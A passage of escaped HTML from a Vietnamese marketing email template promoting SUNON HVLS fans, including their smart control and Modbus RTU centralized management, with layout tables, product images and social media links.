0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-thong-minh-haiku\\\" style=\\\"height:47px; v-text-anchor:middle; width:246px;\\\" arcsize=\\\"85%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#e03e2d\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-thong-minh-haiku\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #e03e2d; border-radius: 40px;-webkit-border-radius: 40px; -moz-border-radius: 40px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:15px 44px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">XEM TH\\u00caM - V\\u1ec0 SUNON<\\/span><\\/strong><\\/span><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:18px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #d8d0d0;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; color: #236fa1; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 20px; font-weight: 400;\\\">\\u0110I\\u1ec0U KHI\\u1ec2N TI\\u1ec6N \\u00cdCH - TH\\u00d4NG MINH<\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">Ki\\u1ec3m so\\u00e1t t\\u1ed1t h\\u01a1n c\\u00e1c t\\u00ednh n\\u0103ng \\u0111i\\u1ec1u khi\\u1ec3n c\\u1ee7a qu\\u1ea1t SUNON. N\\u1ebfu b\\u1ea1n c\\u1ea7n m\\u1ee9c \\u0111\\u1ed9 qu\\u1ea3n l\\u00fd t\\u1eadp trung th\\u00f4ng qua Modbus - nh\\u01b0 l\\u00e0 m\\u1ed9t ph\\u01b0\\u01a1ng th\\u1ee9c qu\\u1ea3n l\\u00fd t\\u1eadp trung khi c\\u00f3 qu\\u00e1 nhi\\u1ec1u qu\\u1ea1t c\\u1ea7n qu\\u1ea3n l\\u00fd d\\u1ec5 d\\u00e0ng v\\u00e0 thu\\u1eadn ti\\u1ec7n. H\\u00e3y li\\u00ean h\\u1ec7 v\\u1edbi ch\\u00fang t\\u00f4i !<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">SUNON HVLS cung c\\u1ea5p gi\\u1ea3i ph\\u00e1p qu\\u1ea3n l\\u00fd Modbus th\\u00f4ng qua giao th\\u1ee9c chu\\u1ea9n c\\u00f4ng nghi\\u1ec7p RTU<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">Modbus RTU - \\u0111\\u00e2y l\\u00e0 m\\u1ed9t giao th\\u1ee9c \\u0111\\u01b0\\u1ee3c s\\u1eed d\\u1ee5ng r\\u1ed9ng r\\u00e3i trong nhi\\u1ec1u l\\u0129nh v\\u1ef1c nh\\u01b0 BMS (Building Management Systems), t\\u1ef1 \\u0111\\u1ed9ng h\\u00f3a, c\\u00f4ng nghi\\u1ec7p<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680169223539-remote-control.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 180px;\\\" width=\\\"180\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680169233314-bien-tan.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 180px;\\\" width=\\\"180\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:18px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #95a5a6;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680168298010-tiet-kiem-dien-s10.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:19px 33px 40px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: \'Source Sans Pro\',sans-serif; font-size: 28px; font-weight: 700; color: #236fa1; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px; font-family: \'Source Sans Pro\', sans-serif;\\\">Kh\\u00f4ng Ch\\u1ec9 L\\u00e0 M\\u00e1t - M\\u00e0 C\\u00f2n H\\u01a1n Th\\u1ebf N\\u1eefa<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #272362;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #272362;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_social_1\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 4px 4px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <div style=\\\"display: table; max-width:254px;\\\">\\r\\n  <!--[if (mso)|(IE)]><table width=\\\"254\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"border-collapse:collapse;\\\" align=\\\"center\\\"><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:254px;\\\"><tr><![endif]-->\\r\\n  \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 19px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 19px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" https:\\/\\/www.facebook.com\\/bigfans.vn\\\" title=\\\"Facebook\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/squared\\/facebook.png\\\" alt=\\\"Facebook\\\" title=\\\"Facebook\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 19px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 19px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" https:\\/\\/twitter.com\\/hgpco\\\" title=\\\"Twitter\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/squared\\/twitter.png\\\" alt=\\\"Twitter\\\" title=\\\"Twitter\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 19px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 19px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" https:\\/\\/www.linkedin.com\\/company\\/hogiaphat\\/\\\" title=\\\"LinkedIn\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/squared\\/linkedin.png\\\" alt=\\\"LinkedIn\\\" title=\\\"LinkedIn\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 19px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 19px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td 